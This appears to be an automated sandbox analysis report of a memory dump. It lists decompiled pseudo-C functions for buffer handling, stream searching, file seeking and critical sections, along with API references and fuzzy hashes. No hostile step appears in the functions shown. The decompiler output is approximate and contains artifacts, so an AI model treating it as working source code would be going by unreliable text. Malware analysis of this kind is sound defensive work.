                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??2@??3@memcpy
                                          • String ID:
                                          • API String ID: 1695611338-0
                                          • Opcode ID: cc26054cedb3141646bbc3c691cf70701c6d8f4186f96d611e94e3a5490a9643
                                          • Instruction ID: 41b234041f6f91087d42b0e57e97fd4fa0d4009db4bb1be59154aa6f59a166d2
                                          • Opcode Fuzzy Hash: cc26054cedb3141646bbc3c691cf70701c6d8f4186f96d611e94e3a5490a9643
                                          • Instruction Fuzzy Hash: A4F028776402157BC714AF66DC4189BF7B8FB84750B10C53FF11983241E774E8908B98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041B15E, Relevance: 4.5, APIs: 3, Instructions: 40COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E0041B15E(void** __ecx) {
				unsigned int _t13;
				void* _t15;
				signed int _t16;
				void* _t19;
				signed int _t30;
				signed int _t33;
				void** _t35;
				void* _t38;

				_t35 = __ecx;
				_t1 =  &(_t35[2]); // 0xb8
				_t13 =  *_t1;
				_t38 = __ecx[1] - _t13;
				if(_t38 == 0) {
					_t4 = _t13 + 1; // 0xb9
					_t33 = (_t13 >> 2) + _t4;
					_t30 = 4;
					_t15 = _t33 * _t30;
					_push( ~(0 | _t38 > 0x00000000) | _t15); // executed
					L0041C16C(); // executed
					_t19 = _t15;
					_t11 =  &(_t35[1]); // 0xa1
					_t16 =  *_t11;
					if(_t16 != 0) {
						_t16 = memcpy(_t19,  *__ecx, _t16 << 2);
					}
					_push( *_t35);
					L0041C160();
					_t35[2] = _t33;
					 *_t35 = _t19;
					return _t16;
				}
				return _t13;
			}











                                          0x0041b15f
                                          0x0041b161
                                          0x0041b161
                                          0x0041b164
                                          0x0041b167
                                          0x0041b170
                                          0x0041b170
                                          0x0041b178
                                          0x0041b17b
                                          0x0041b184
                                          0x0041b185
                                          0x0041b18a
                                          0x0041b18c
                                          0x0041b18c
                                          0x0041b192
                                          0x0041b19b
                                          0x0041b1a0
                                          0x0041b1a3
                                          0x0041b1a5
                                          0x0041b1ab
                                          0x0041b1af
                                          0x00000000
                                          0x0041b1b1
                                          0x0041b1b3

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??2@??3@memcpy
                                          • String ID:
                                          • API String ID: 1695611338-0
                                          • Opcode ID: 91c820cf10390928d26acf8c173fe49508c3b57a2df9f472010eb66c9cb0f426
                                          • Instruction ID: f77cdbf6906714633c75e9a2ae5cc25cbcb182668cea9c8853bdfda8a470c8a2
                                          • Opcode Fuzzy Hash: 91c820cf10390928d26acf8c173fe49508c3b57a2df9f472010eb66c9cb0f426
                                          • Instruction Fuzzy Hash: 52F0E9723402016BD7385B2DEC929A7F3E9DF88754314852FF54AC6291DAB59C808A58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402565, Relevance: 4.5, APIs: 3, Instructions: 16COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E00402565(intOrPtr* __ecx, signed char _a4) {
				intOrPtr* _t9;

				_t9 = __ecx;
				_t1 = _t9 + 0xc; // 0x9deb28
				_push( *_t1);
				L0041C160();
				_push( *__ecx); // executed
				L0041C160(); // executed
				if((_a4 & 0x00000001) != 0) {
					_push(__ecx);
					L0041C160();
				}
				return _t9;
			}




                                          0x00402566
                                          0x00402568
                                          0x00402568
                                          0x0040256b
                                          0x00402570
                                          0x00402572
                                          0x0040257e
                                          0x00402580
                                          0x00402581
                                          0x00402586
                                          0x0040258a

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: 7dbb93740365e90a040355f991de0436f65578732d95a5632698f13562009b00
                                          • Instruction ID: 334385da2bad53f91c1efd3fd60114aff8a744570c2a42595eac9cdc1e1cb50b
                                          • Opcode Fuzzy Hash: 7dbb93740365e90a040355f991de0436f65578732d95a5632698f13562009b00
                                          • Instruction Fuzzy Hash: 0FD022362882743AD2253614FC42ACBA7E08F00B28F20092FF880600D38FEA2CC04A8C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004030D6, Relevance: 3.9, APIs: 3, Instructions: 125stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 52%
                                          			E004030D6(intOrPtr* __ecx, CHAR* __edx, void* __eflags, CHAR* _a4, intOrPtr* _a8) {
				char _v5;
				intOrPtr* _v12;
				char _v16;
				int _v20;
				char _v24;
				char _v28;
				CHAR* _v32;
				int _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr* _v52;
				void _v4148;
				intOrPtr* _t66;
				intOrPtr _t73;
				intOrPtr _t74;
				intOrPtr* _t81;
				char _t83;
				intOrPtr* _t86;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t104;
				int _t108;
				void* _t111;
				void* _t112;

				_t86 = __ecx;
				E0041C1C0(0x1030, __ecx);
				_t104 = _t86;
				_v32 = __edx;
				_v52 = _t104;
				 *((intOrPtr*)( *_t104 + 0x10))(_t104, 0, 0, 0, 0);
				_t66 = _a8;
				 *((intOrPtr*)(_t66 + 4)) = 0;
				 *((char*)( *_t66)) = 0;
				_v20 = lstrlenA(_v32);
				_v36 = lstrlenA(_a4);
				_t108 = 0;
				_v5 = 0;
				_v28 = 0;
				_v24 = 0;
				while(1) {
					L2:
					_push( &_v48);
					_push(0x1000 - _t108);
					_push(_t111 + _t108 - 0x1030);
					_push(_t104); // executed
					if( *((intOrPtr*)( *_t104 + 0xc))() != 0) {
						break;
					}
					_t73 = _v48;
					if(_t73 == 0) {
						break;
					}
					_t74 = _t73 + _t108;
					_v44 = _t74;
					_v16 = 0;
					_v12 =  &_v4148;
					while(1) {
						L5:
						_t92 = _v16;
						_t99 = _t74;
						if(_v5 == 0) {
							break;
						}
						if(_t92 > _t99 - _v36) {
							L14:
							_v28 = _v28 + _t92;
							_t108 = _t74 - _t92;
							asm("adc [ebp-0x14], ebx");
							memmove( &_v4148, _t111 + _t92 - 0x1030, _t108);
							_t112 = _t112 + 0xc;
							if(_v24 > 0 || _v28 > 0x100000) {
								return 0 |  *((intOrPtr*)(_a8 + 4)) != 0x00000000;
							} else {
								_t104 = _v52;
								goto L2;
							}
						}
						_t81 = _v12;
						asm("repe cmpsb");
						if(0 == 0) {
							return 1;
						}
						_t83 =  *_t81;
						_v40 = _t83;
						if(_t83 == 0) {
							goto L18;
						}
						E00402F9F(_a8, _v40);
						_v16 = _v16 + 1;
						_v12 = _v12 + 1;
						_t74 = _v44;
					}
					if(_t92 > _t99 - _v20) {
						goto L14;
					}
					asm("repe cmpsb");
					if(0 != 0) {
						_v16 = _v16 + 1;
						_v12 = _v12 + 1;
					} else {
						_t95 = _v20;
						_v16 = _v16 + _t95;
						_v12 = _v12 + _t95;
						_v5 = 1;
					}
					goto L5;
				}
				L18:
				return 0;
			}





























                                          0x004030d6
                                          0x004030de
                                          0x004030eb
                                          0x004030f1
                                          0x004030f4
                                          0x004030f7
                                          0x004030fa
                                          0x00403106
                                          0x0040310b
                                          0x00403112
                                          0x00403117
                                          0x0040311a
                                          0x0040311c
                                          0x0040311f
                                          0x00403122
                                          0x0040312a
                                          0x0040312a
                                          0x0040312f
                                          0x00403137
                                          0x0040313f
                                          0x00403140
                                          0x00403146
                                          0x00000000
                                          0x00000000
                                          0x0040314c
                                          0x00403151
                                          0x00000000
                                          0x00000000
                                          0x00403157
                                          0x0040315f
                                          0x00403162
                                          0x00403165
                                          0x00403168
                                          0x00403168
                                          0x00403168
                                          0x0040316b
                                          0x00403170
                                          0x00000000
                                          0x00000000
                                          0x00403177
                                          0x004031de
                                          0x004031e0
                                          0x004031e3
                                          0x004031ec
                                          0x004031f8
                                          0x004031fe
                                          0x00403204
                                          0x00000000
                                          0x00403127
                                          0x00403127
                                          0x00000000
                                          0x00403127
                                          0x00403204
                                          0x00403179
                                          0x00403186
                                          0x00403188
                                          0x00000000
                                          0x00403220
                                          0x0040318e
                                          0x00403190
                                          0x00403195
                                          0x00000000
                                          0x00000000
                                          0x004031a1
                                          0x004031a6
                                          0x004031a9
                                          0x004031ac
                                          0x004031ac
                                          0x004031b6
                                          0x00000000
                                          0x00000000
                                          0x004031c3
                                          0x004031c5
                                          0x004031d6
                                          0x004031d9
                                          0x004031c7
                                          0x004031c7
                                          0x004031ca
                                          0x004031cd
                                          0x004031d0
                                          0x004031d0
                                          0x00000000
                                          0x004031c5
                                          0x00403224
                                          0x00000000

                                          APIs
                                          • lstrlenA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,009D2650,00000000,?,00404E00,?,?,?,?,?), ref: 0040310D
                                          • lstrlenA.KERNEL32(009D2650,?,00000000,00000000,00000000,00000000,?,009D2650,00000000,?,00404E00,?,?,?,?,?), ref: 00403115
                                          • memmove.MSVCRT ref: 004031F8
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: lstrlen$memmove
                                          • String ID:
                                          • API String ID: 1832346882-0
                                          • Opcode ID: 5822003b85987e6036de6aec5d2bc904ab5e1e21d5ee4ecd78f4138bcaa71753
                                          • Instruction ID: 93814ce0f0a0d2477efb8002a8279e42b82102d5932b68c1d783b4d7f2fd7925
                                          • Opcode Fuzzy Hash: 5822003b85987e6036de6aec5d2bc904ab5e1e21d5ee4ecd78f4138bcaa71753
                                          • Instruction Fuzzy Hash: D5412871D04258AFCB14CFA9D8808EEBBB9FF48351F1480AAE815B7341D7789E46CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004075CF, Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E004075CF(intOrPtr* __ecx, void* __edx, void* __eflags) {
				void* _t8;
				int _t15;
				void* _t20;
				intOrPtr* _t24;
				signed int _t26;
				signed int _t27;

				_t20 = __edx;
				_t24 = __ecx;
				 *__ecx = 0x41ee80;
				E004147DF(_t8, __ecx + 0x3c);
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0x18;
				 *((intOrPtr*)(__ecx + 0x38)) = 0;
				_t26 =  *0x4228ac; // 0x280
				if(_t26 == 0) {
					_t27 =  *0x4228b0; // 0x1e0
					if(_t27 == 0) {
						GetSystemMetrics(0x10); // executed
						asm("cdq");
						 *0x4228ac = 0 - _t20 >> 1;
						_t15 = GetSystemMetrics(0x11);
						asm("cdq");
						 *0x4228b0 = _t15 - _t20 >> 1;
					}
				}
				return _t24;
			}









                                          0x004075cf
                                          0x004075d0
                                          0x004075d5
                                          0x004075db
                                          0x004075e2
                                          0x004075e5
                                          0x004075e8
                                          0x004075eb
                                          0x004075ee
                                          0x004075f5
                                          0x004075f8
                                          0x004075fe
                                          0x00407600
                                          0x00407606
                                          0x00407611
                                          0x00407613
                                          0x0040761a
                                          0x0040761f
                                          0x00407621
                                          0x00407626
                                          0x0040762b
                                          0x00407606
                                          0x0040762f

                                          APIs
                                            • Part of subcall function 004147DF: ??2@YAPAXI@Z.MSVCRT ref: 004147E7
                                          • KiUserCallbackDispatcher.NTDLL ref: 00407611
                                          • GetSystemMetrics.USER32 ref: 0040761F
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??2@CallbackDispatcherMetricsSystemUser
                                          • String ID:
                                          • API String ID: 145748454-0
                                          • Opcode ID: 80a77b5a3344e25ea2b7d0931445c3057c7d5eaafae3869ce9cddb487c245e27
                                          • Instruction ID: 6ce0d3d2a294cc817c3ed94d35c4e8eadf3e8454e0af582e39282335f7eac732
                                          • Opcode Fuzzy Hash: 80a77b5a3344e25ea2b7d0931445c3057c7d5eaafae3869ce9cddb487c245e27
                                          • Instruction Fuzzy Hash: 14F01DB0A00B019FD3B0EF7D9D00686BBE5BB48310B458A3FD596C3690E7B4E4468F59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00413E3A, Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 79%
                                          			E00413E3A(void** __ecx, long _a4, long _a8, long _a12, intOrPtr* _a16) {
				long _v8;
				long _t11;
				intOrPtr* _t13;
				void* _t14;
				long _t23;

				_push(__ecx);
				_v8 = _a8;
				_t11 = SetFilePointer( *__ecx, _a4,  &_v8, _a12); // executed
				_t23 = _t11;
				if(_t23 != 0xffffffff || GetLastError() == 0) {
					asm("adc edx, eax");
					_t13 = _a16;
					 *_t13 = 0 + _t23;
					 *((intOrPtr*)(_t13 + 4)) = _v8;
					_t14 = 1;
				} else {
					_t14 = 0;
				}
				return _t14;
			}








                                          0x00413e3d
                                          0x00413e47
                                          0x00413e56
                                          0x00413e5c
                                          0x00413e61
                                          0x00413e7a
                                          0x00413e7c
                                          0x00413e7f
                                          0x00413e81
                                          0x00413e84
                                          0x00413e6d
                                          0x00413e6d
                                          0x00413e6d
                                          0x00413e88

                                          APIs
                                          • SetFilePointer.KERNELBASE(?,?,?,?), ref: 00413E56
                                          • GetLastError.KERNEL32(?,?,?,?), ref: 00413E63
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorFileLastPointer
                                          • String ID:
                                          • API String ID: 2976181284-0
                                          • Opcode ID: 007787c2f3829a3ae304c77fe7b9cc5777807232d41288a06886aba40bf6d8ab
                                          • Instruction ID: e393e3b0b581c03f2e1373165af33d27313eb1f81299ccbe74c3423d21431cf3
                                          • Opcode Fuzzy Hash: 007787c2f3829a3ae304c77fe7b9cc5777807232d41288a06886aba40bf6d8ab
                                          • Instruction Fuzzy Hash: 27F03AB5A00318AF8F00CF68DC049DB7BE9AF49320B148169E816D73A1E635DE51EBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040706D, Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040706D(void** __ecx) {
				void* _t1;
				int _t3;
				long _t4;
				signed int* _t7;

				_t7 = __ecx;
				_t1 =  *__ecx;
				if(_t1 == 0) {
					L4:
					 *_t7 =  *_t7 & 0x00000000;
					return 0;
				}
				_t3 = FindCloseChangeNotification(_t1); // executed
				if(_t3 != 0) {
					goto L4;
				}
				_t4 = GetLastError();
				if(_t4 != 0) {
					return _t4;
				} else {
					return _t4 + 1;
				}
			}







                                          0x0040706e
                                          0x00407070
                                          0x00407074
                                          0x0040708e
                                          0x0040708e
                                          0x00000000
                                          0x00407091
                                          0x00407077
                                          0x0040707f
                                          0x00000000
                                          0x00000000
                                          0x00407081
                                          0x00407089
                                          0x00407094
                                          0x0040708b
                                          0x0040708d
                                          0x0040708d

                                          APIs
                                          • FindCloseChangeNotification.KERNELBASE ref: 00407077
                                          • GetLastError.KERNEL32 ref: 00407081
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ChangeCloseErrorFindLastNotification
                                          • String ID:
                                          • API String ID: 1687624791-0
                                          • Opcode ID: fcb9912ee9e400018ef209a841302b1aaf816a01443b7f738557e835576f0385
                                          • Instruction ID: 96f2dfdfe28989b5cd873708e3b39c2c89f49a9b4d101e1b90dfae413db12efb
                                          • Opcode Fuzzy Hash: fcb9912ee9e400018ef209a841302b1aaf816a01443b7f738557e835576f0385
                                          • Instruction Fuzzy Hash: B6D0C771B1C1115BEBB05F79FC0879372D9AF01751B25857BEC81D2240EB78DC41865A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041C172, Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: __dllonexit_onexit
                                          • String ID:
                                          • API String ID: 2384194067-0
                                          • Opcode ID: 3f6902fc8b7ba21d02d425c2127135aaf0fa078405c295ac591937e8f1ed3469
                                          • Instruction ID: d90210f8ed818c547b06286f749277b62e7de9e8c25a3e05c31bbee2e42e59a4
                                          • Opcode Fuzzy Hash: 3f6902fc8b7ba21d02d425c2127135aaf0fa078405c295ac591937e8f1ed3469
                                          • Instruction Fuzzy Hash: 8CC0C7745C6200F6D5212711FD055957611D650721BA1C366B0A9114E187394411B909
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00416C5F, Relevance: 2.6, APIs: 2, Instructions: 65COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 95%
                                          			E00416C5F(signed int _a4, intOrPtr _a8, intOrPtr _a12, signed int* _a16) {
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				intOrPtr _t36;
				intOrPtr* _t38;
				void* _t40;
				intOrPtr _t43;
				intOrPtr _t48;
				signed int* _t49;
				intOrPtr _t50;
				struct _CRITICAL_SECTION* _t56;
				signed int _t57;

				_t57 = _a4;
				_t56 =  *((intOrPtr*)(_t57 + 8)) + 0x18;
				EnterCriticalSection(_t56);
				_t33 =  *((intOrPtr*)(_t57 + 8));
				_t43 =  *((intOrPtr*)(_t57 + 0x10));
				_t50 =  *((intOrPtr*)(_t57 + 0x14));
				if(_t43 !=  *((intOrPtr*)(_t33 + 0x10)) || _t50 !=  *((intOrPtr*)(_t33 + 0x14))) {
					_t34 =  *((intOrPtr*)(_t33 + 8));
					_t35 =  *((intOrPtr*)( *_t34 + 0x10))(_t34, _t43, _t50, 0, 0, _t40);
					if(_t35 == 0) {
						_t36 =  *((intOrPtr*)(_t57 + 8));
						 *((intOrPtr*)(_t36 + 0x10)) =  *((intOrPtr*)(_t57 + 0x10));
						 *((intOrPtr*)(_t36 + 0x14)) =  *((intOrPtr*)(_t57 + 0x14));
						goto L5;
					}
					goto L3;
				} else {
					L5:
					_a4 = _a4 & 0x00000000;
					_t38 =  *((intOrPtr*)( *((intOrPtr*)(_t57 + 8)) + 8));
					_t35 =  *((intOrPtr*)( *_t38 + 0xc))(_t38, _a8, _a12,  &_a4);
					 *((intOrPtr*)(_t57 + 0x10)) =  *((intOrPtr*)(_t57 + 0x10)) + _a4;
					_t48 =  *((intOrPtr*)(_t57 + 8));
					asm("adc dword [esi+0x14], 0x0");
					 *((intOrPtr*)(_t48 + 0x10)) =  *((intOrPtr*)(_t57 + 0x10));
					 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t57 + 0x14));
					_t49 = _a16;
					if(_t49 != 0) {
						 *_t49 = _a4;
					}
					L3:
					LeaveCriticalSection(_t56);
					return _t35;
				}
			}















                                          0x00416c63
                                          0x00416c6a
                                          0x00416c6e
                                          0x00416c74
                                          0x00416c77
                                          0x00416c7a
                                          0x00416c80
                                          0x00416c87
                                          0x00416c94
                                          0x00416c9a
                                          0x00416cb0
                                          0x00416cb3
                                          0x00416cb9
                                          0x00000000
                                          0x00416cb9
                                          0x00000000
                                          0x00416cbc
                                          0x00416cbc
                                          0x00416cbc
                                          0x00416cc3
                                          0x00416cd3
                                          0x00416cd9
                                          0x00416cdc
                                          0x00416ce2
                                          0x00416ce6
                                          0x00416cec
                                          0x00416cef
                                          0x00416cf4
                                          0x00416cf9
                                          0x00416cf9
                                          0x00416c9c
                                          0x00416c9f
                                          0x00416caa
                                          0x00416caa

                                          APIs
                                          • EnterCriticalSection.KERNEL32(?), ref: 00416C6E
                                          • LeaveCriticalSection.KERNEL32(?), ref: 00416C9F
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave
                                          • String ID:
                                          • API String ID: 3168844106-0
                                          • Opcode ID: 80b0caaff10c416497a586019b2a9d69b27888ac1aed855ea2cae2a1bb9cdcd0
                                          • Instruction ID: 4f6a01db9a79f93195a0f3714a2cbc373184e23470928e7da344a92c66c74959
                                          • Opcode Fuzzy Hash: 80b0caaff10c416497a586019b2a9d69b27888ac1aed855ea2cae2a1bb9cdcd0
                                          • Instruction Fuzzy Hash: AD2116752007009FCB28CF55D884EA7B7B9FF88314B158A5DE89A8B761D371F841CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00418B0C, Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E00418B0C() {
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				intOrPtr* _t50;
				intOrPtr* _t56;
				intOrPtr* _t57;
				void* _t66;
				intOrPtr* _t67;
				void* _t78;
				intOrPtr* _t80;
				void* _t82;
				intOrPtr* _t83;
				void* _t85;
				void* _t87;

				L0041C1F0();
				 *((intOrPtr*)(_t85 - 0x10)) = _t87 - 0x88;
				 *(_t85 - 4) = 0;
				_t83 =  *((intOrPtr*)(_t85 + 8));
				 *((intOrPtr*)( *_t83 + 0x10))(_t83, _t78, _t82, _t66);
				 *(_t85 - 4) = 1;
				_t67 =  *((intOrPtr*)(_t85 + 0x14));
				if(_t67 != 0) {
					 *((intOrPtr*)( *_t67 + 4))(_t67);
				}
				 *((intOrPtr*)(_t85 + 0x14)) = 0;
				_t91 = _t67;
				if(_t67 != 0) {
					 *((intOrPtr*)( *_t67))(_t67, 0x41d530, _t85 + 0x14);
				}
				 *((intOrPtr*)(_t85 - 0x94)) = 0;
				 *((intOrPtr*)(_t85 - 0x90)) = 0;
				 *((char*)(_t85 - 0x1c)) = 1;
				 *((char*)(_t83 + 0x140)) = 0;
				_push( *((intOrPtr*)(_t85 + 0x10)));
				_t80 = E00419788(_t85 - 0x94, _t91,  *((intOrPtr*)(_t85 + 0xc)));
				if(_t80 == 0) {
					 *((char*)(_t83 + 0x140)) = 1;
					_push(_t83 + 0x14c);
					_push(_t83 + 0x149);
					_push(_t83 + 0x148);
					_push( *((intOrPtr*)(_t85 + 0x14)));
					_push(_t83 + 0x10);
					_t47 = E0041B0DD(_t85 - 0x94); // executed
					_t80 = _t47;
					__eflags = _t80;
					if(_t80 != 0) {
						goto L5;
					} else {
						E004160A2(_t83 + 0xc,  *((intOrPtr*)(_t85 + 0xc)));
						_t56 =  *((intOrPtr*)(_t85 - 0x94));
						__eflags = _t56;
						if(_t56 != 0) {
							 *((intOrPtr*)( *_t56 + 8))(_t56);
						}
						_t57 =  *((intOrPtr*)(_t85 + 0x14));
						__eflags = _t57;
						if(_t57 != 0) {
							 *((intOrPtr*)( *_t57 + 8))(_t57);
						}
						__eflags = _t67;
						if(_t67 != 0) {
							 *((intOrPtr*)( *_t67 + 8))(_t67);
						}
						 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
						_t50 = 0;
					}
				} else {
					L5:
					_t48 =  *((intOrPtr*)(_t85 - 0x94));
					if(_t48 != 0) {
						 *((intOrPtr*)( *_t48 + 8))(_t48);
					}
					_t49 =  *((intOrPtr*)(_t85 + 0x14));
					if(_t49 != 0) {
						 *((intOrPtr*)( *_t49 + 8))(_t49);
					}
					if(_t67 != 0) {
						 *((intOrPtr*)( *_t67 + 8))(_t67);
					}
					_t50 = _t80;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t85 - 0xc));
				return _t50;
			}

















                                          0x00418b11
                                          0x00418b1f
                                          0x00418b24
                                          0x00418b27
                                          0x00418b2d
                                          0x00418b30
                                          0x00418b34
                                          0x00418b39
                                          0x00418b3e
                                          0x00418b3e
                                          0x00418b41
                                          0x00418b44
                                          0x00418b46
                                          0x00418b54
                                          0x00418b54
                                          0x00418b56
                                          0x00418b5c
                                          0x00418b62
                                          0x00418b66
                                          0x00418b6d
                                          0x00418b7e
                                          0x00418b82
                                          0x00418bb2
                                          0x00418bbf
                                          0x00418bc6
                                          0x00418bcd
                                          0x00418bce
                                          0x00418bd4
                                          0x00418bdb
                                          0x00418be0
                                          0x00418be2
                                          0x00418be4
                                          0x00000000
                                          0x00418be6
                                          0x00418bec
                                          0x00418bf1
                                          0x00418bf7
                                          0x00418bf9
                                          0x00418bfe
                                          0x00418bfe
                                          0x00418c01
                                          0x00418c04
                                          0x00418c06
                                          0x00418c0b
                                          0x00418c0b
                                          0x00418c0e
                                          0x00418c10
                                          0x00418c15
                                          0x00418c15
                                          0x00418c18
                                          0x00418c1c
                                          0x00418c1c
                                          0x00418b84
                                          0x00418b84
                                          0x00418b84
                                          0x00418b8c
                                          0x00418b91
                                          0x00418b91
                                          0x00418b94
                                          0x00418b99
                                          0x00418b9e
                                          0x00418b9e
                                          0x00418ba3
                                          0x00418ba8
                                          0x00418ba8
                                          0x00418bab
                                          0x00418bab
                                          0x00418c42
                                          0x00418c4d

                                          APIs
                                          • _EH_prolog.MSVCRT ref: 00418B11
                                            • Part of subcall function 0041B0DD: _EH_prolog.MSVCRT ref: 0041B0E2
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: b48e2961efca33cdc268dc06a9db708dae6e35986a8212076dca9429ba69aabe
                                          • Instruction ID: 224d0b28c9c96a8b720adceb05dc78df915ef04c78251989e0adf3722648e023
